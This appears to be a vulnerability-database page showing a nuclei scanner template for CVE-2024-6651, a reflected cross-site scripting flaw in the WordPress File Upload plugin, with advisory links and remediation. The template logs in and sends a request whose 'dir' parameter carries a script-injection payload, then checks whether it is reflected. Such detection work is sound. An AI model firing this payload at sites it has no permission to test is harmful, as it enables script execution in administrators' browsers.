Lucene search
K

WordPress File Upload Plugin < 4.24.8 - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

WordPress File Upload Plugin < 4.24.8 has high severity cross-site scripting vulnerability.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-6651
6 Aug 202409:09
circl
CNNVD
WordPress plugin File Upload 安全漏洞
6 Aug 202400:00
cnnvd
CVE
CVE-2024-6651
6 Aug 202406:00
cve
Cvelist
CVE-2024-6651 WordPress File Upload < 4.24.8 - Reflected XSS
6 Aug 202406:00
cvelist
GithubExploit
Exploit for Cross-site Scripting in Iptanus Wordpress_File_Upload
26 Jan 202613:13
githubexploit
NVD
CVE-2024-6651
6 Aug 202406:15
nvd
OSV
CVE-2024-6651
6 Aug 202406:15
osv
Patchstack
WordPress WordPress File Upload plugin < 4.24.8 - Reflected XSS vulnerability
6 Aug 202406:36
patchstack
Patchstack
WordPress WordPress File Upload Plugin < 4.24.8 is vulnerable to Cross Site Scripting (XSS)
6 Aug 202400:00
patchstack
RedhatCVE
CVE-2024-6651
23 May 202510:22
redhatcve
Rows per page
id: CVE-2024-6651

info:
  name: WordPress File Upload Plugin < 4.24.8 - Cross-Site Scripting
  author: ritikchaddha
  severity: high
  description: |
    The WordPress File Upload plugin before version 4.24.8 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'dir' parameter in the file browser page before outputting it back, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context.
  impact: |
    Attackers can execute arbitrary JavaScript in administrator browsers by crafting malicious URLs with XSS payloads in the dir parameter.
  remediation: |
    Update WordPress File Upload plugin to version 4.24.8 or later to address the reflected XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/65e2c77d-09bd-4a44-81d9-d7a5db0e0f84
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6651
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
    cvss-score: 7.1
    cve-id: CVE-2024-6651
    cwe-id: CWE-79
    epss-score: 0.14058
    epss-percentile: 0.96116
  metadata:
    max-request: 3
    vendor: WordPress
    product: wp-file-upload
    fofa-query: body='wp-content/plugins/wp-file-upload/'
  tags: cve,cve2024,wp,wordpress,wp-plugin,xss,wp-file-upload,authenticated,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - 'wp-file-upload/'
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/options-general.php?page=wordpress_file_upload&action=file_browser&dir=7b2BEyT8ArR1jaD9%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctest%20test%3D HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script><test test='
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100eeabc52d2e58d4b20f3fb5e874fbb8bc0524eb48cd250cf261497e7b92c4581802205a5b8bcb4f367a8f3849cabdfe03bb539ff3c65ea8546902fb430f3ab6c7d93d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.16.1
EPSS0.14058
SSVC
28